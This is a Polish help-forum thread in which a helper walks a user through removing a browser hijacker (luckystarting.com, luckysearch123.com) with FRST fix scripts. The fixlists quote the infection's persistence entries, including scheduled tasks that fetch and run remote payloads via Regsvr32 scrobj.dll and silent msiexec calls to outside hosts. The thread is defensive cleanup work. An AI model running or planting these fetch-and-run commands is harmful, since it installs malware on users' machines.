Cały czas włącza się luckystarting.com i nie mogę się tego pozbyć

Witam!
Proszę bardzo o pomoc w usunięciu syfa z laptopa. Próbowałem z panelu sterowania, z ustawień google chrome itd. , ale trzeba podjąć konkretniejsze kroki. Załączam pliki z FRST.

@montstal
Odinstaluj:
McAfee Security Scan Plus
McAfee WebAdvisor

Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
CloseProcesses:
Task: {1025134F-7F9A-4C58-8A86-A720880D9F71} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1SMdk5MjUdMTq4RUI1FdM4FkUcMYNSM8VWMkVWNdI3Rq== scrobj.dll
Task: {4842934E-FD9B-4F57-85D9-DCE081BD425F} - System32\Tasks\Opera scheduled Autoupdate 1490522945 => C:\Users\Ja\AppData\Local\Programs\Opera\launcher.exe [2017-03-21] (Opera Software)
Task: {97CFDDCF-623C-4A59-95D6-221D21A3F13B} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1SMdk5MjUdMTq4RUI1FdM4FkUcMYNSM8VWMkVWNdI3Rq== scrobj.dll
Shortcut: C:\Users\Ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Hosts:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2161146674-1075650123-2452356426-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SMdk5MjUdMTq4RUI1FdM4FkUcMYNSM8VWMkVWNdI3Rq== /q
IFEO\taskmgr.exe: [Debugger]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2017-04-13]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe (McAfee, Inc.)
BHO: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
BHO-x32: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-03-27] (McAfee, Inc.)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2017-02-14]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
CHR Extension: (McAfee® WebAdvisor) - C:\Users\Ja\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2017-03-26]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
S2 0299241492760795mcinstcleanup; C:\Windows\TEMP\029924~1.EXE [883024 2017-04-21] (McAfee, Inc.)
S2 FirefoxDL; C:\Users\Ja\AppData\Local\Temp\fAB92.tmp\QQBrowser.exe [131640 2015-01-06] (Tencent Inc.) <==== UWAGA
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [188264 2017-03-27] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.523\McCHSvc.exe [404376 2017-03-20] (McAfee, Inc.)
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
2017-04-21 16:43 - 2017-04-21 16:43 - 00000000 _____ C:\Windows\SysWOW64\33
2017-04-21 16:43 - 2017-04-21 16:43 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-21 16:43 - 2017-04-21 16:43 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-21 16:43 - 2017-04-21 16:43 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-18 10:28 - 2017-04-18 10:28 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-04-18 10:08 - 2017-04-22 16:49 - 00000000 ____D C:\AdwCleaner
2017-04-17 21:13 - 2017-04-17 21:13 - 00000000 ____D C:\Program Files (x86)\temp
2017-04-17 20:47 - 2017-04-17 20:48 - 00000000 ____D C:\Users\Ja\AppData\LocalLow\Mozilla
2017-04-17 20:47 - 2017-04-17 20:47 - 00002073 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-17 20:47 - 2017-04-17 20:47 - 00002003 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-17 20:47 - 2017-04-17 20:47 - 00000000 ____D C:\Users\Ja\AppData\Roaming\Mozilla
2017-04-17 20:47 - 2017-04-17 20:47 - 00000000 ____D C:\Users\Ja\AppData\Local\Eastness
2017-04-17 20:47 - 2017-04-17 20:47 - 00000000 ____D C:\ProgramData\Software
2017-04-17 20:47 - 2017-04-17 20:47 - 00000000 ____D C:\Program Files (x86)\Eastness
2017-04-17 20:45 - 2017-04-17 20:45 - 00000000 ____D C:\Users\Ja\AppData\Local\SNARE
2017-04-17 20:45 - 2017-04-17 20:45 - 00000000 ____D C:\Users\Ja\AppData\Local\Kitty
2017-04-17 20:45 - 2017-04-17 20:45 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-17 20:40 - 2017-04-19 13:07 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-14 19:24 - 2017-04-14 19:24 - 00001096 _____ C:\Users\Ja\Desktop\ByteFence Anti-Malware.lnk
2017-04-13 22:50 - 2017-04-13 22:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2017-04-13 22:50 - 2017-04-13 22:50 - 00000000 ____D C:\Program Files\McAfee Security Scan
2017-04-13 22:41 - 2017-04-13 22:41 - 00003682 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 22:41 - 2017-04-13 22:41 - 00000000 ____D C:\Users\Ja\AppData\Roaming\SSMgre
2017-04-13 22:30 - 2017-04-18 10:26 - 00000000 ____D C:\Program Files\Common Files\McAfee
2017-04-13 22:20 - 2017-04-13 22:50 - 00002009 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2017-04-13 22:20 - 2017-04-13 22:20 - 00000000 ____D C:\ProgramData\McAfee Security Scan
2017-04-10 11:16 - 2017-04-13 22:41 - 00003660 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT
2017-03-26 12:08 - 2017-03-26 12:08 - 00000000 ____D C:\Program Files\McAfee
2017-03-26 12:07 - 2017-04-21 09:46 - 00000000 ____D C:\Program Files (x86)\McAfee
2017-03-26 12:07 - 2017-04-18 10:17 - 00000000 ____D C:\ProgramData\McAfee
EmptyTemp:

Podany Fixlist.txt wykonaj w trybie awaryjnym, nastepnie w trybie normalnym.

Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

Edytowałem post, po wydzieleniu zbędnego. RADU23

Witam. Zrobiłem fixy na awaryjnym i normalnym trybie. Widzę, że usunęło chrome'a, otworzyłem w operze i jakieś jeszcze wysoczyły okienka. Załączam fixloga.

To byl chrome utworzony przez infekcje.

Nie wykonales:
> Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

Sorry. Już daję.

Odinstaluj: YAC(Yet Another Cleaner!)

Zrob kopie zakladek z Firefox'a, profil przegladarki zostanie usuniety.

Wykonaj Fixlist.txt dla FRST:
CloseProcesses:
HKU\S-1-5-21-2161146674-1075650123-2452356426-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Eastness\Application\chrome.exe" -- "%1" <==== UWAGA
Task: {7CFEC8F5-64CE-4CDA-8CF6-13ED08ED436D} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
2017-04-25 11:30 - 2016-05-23 04:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
2017-04-25 11:30 - 2016-05-23 04:37 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll
2017-04-08 20:40 - 2017-04-08 20:40 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2017-03-26 12:27 - 2017-03-26 12:27 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2017-04-08 20:40 - 2017-04-08 20:40 - 00176480 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll
2017-04-08 20:40 - 2017-04-08 20:40 - 00293936 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2017-04-08 20:40 - 2017-04-08 20:40 - 00653520 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe
FF DefaultProfile: 3isdtq5k.default
FF ProfilePath: C:\Users\Ja\AppData\Roaming\Firefox\Firefox\Profiles\3isdtq5k.default [2017-04-26]
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
2017-04-26 20:48 - 2017-04-26 20:48 - 00000000 ____D C:\Users\Ja\Downloads\FRST-OlderVersion
2017-04-25 13:53 - 2017-04-25 13:53 - 00003540 _____ C:\Windows\System32\Tasks\T0528
2017-04-25 11:30 - 2017-04-25 11:30 - 00000000 ____D C:\Windows\system32\log
2017-04-25 11:30 - 2017-04-25 11:30 - 00000000 ____D C:\Users\Ja\AppData\Roaming\Elex-tech
2017-04-25 11:30 - 2017-04-25 11:30 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-04-25 11:30 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2017-04-25 11:30 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys
2017-04-25 11:29 - 2017-04-25 11:29 - 00000000 ____D C:\Users\Ja\AppData\Roaming\Firefox
2017-04-25 11:29 - 2017-04-25 11:29 - 00000000 ____D C:\Users\Ja\AppData\Local\Firefox
2017-04-25 11:29 - 2017-04-25 11:29 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-25 11:29 - 2017-04-25 11:29 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-13 22:41 - 2017-03-26 12:23 - 00000000 ____D C:\Users\Ja\AppData\Roaming\ScreenShot
C:\Program Files (x86)\ScreenShot\

Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

Juz wysyłam

Usun dane synchronizacji Chrome z konta google:
https://support.google.com/chrome/answer/6386691?hl=pl

Kolejny Fixlist.txt dla FRST:
CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1493277206&from=f6800427&uid=toshibaxmk5055gsx_y98bs5r5sxxy98bs5r5s&z=359df50c0b440aaf16aba97g1z9tccfo6m6m6o1edq
CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1493277206&from=f6800427&uid=toshibaxmk5055gsx_y98bs5r5sxxy98bs5r5s&z=359df50c0b440aaf16aba97g1z9tccfo6m6m6o1edq"
CHR DefaultSearchURL: Default -> hxxp://www.luckysearch123.com/search.php?type=ds&ts=1493277206&from=f6800427&uid=toshibaxmk5055gsx_y98bs5r5sxxy98bs5r5s&z=359df50c0b440aaf16aba97g1z9tccfo6m6m6o1edq&q={searchTerms}
CHR DefaultSearchKeyword: Default -> luck


W Chrome ustaw wyszukiwarke na Google, do tego odznacz w ustawieniach przywracanie zestawu stron po starcie przegladarki.

Usun katalog C:\FRST i to wszystko.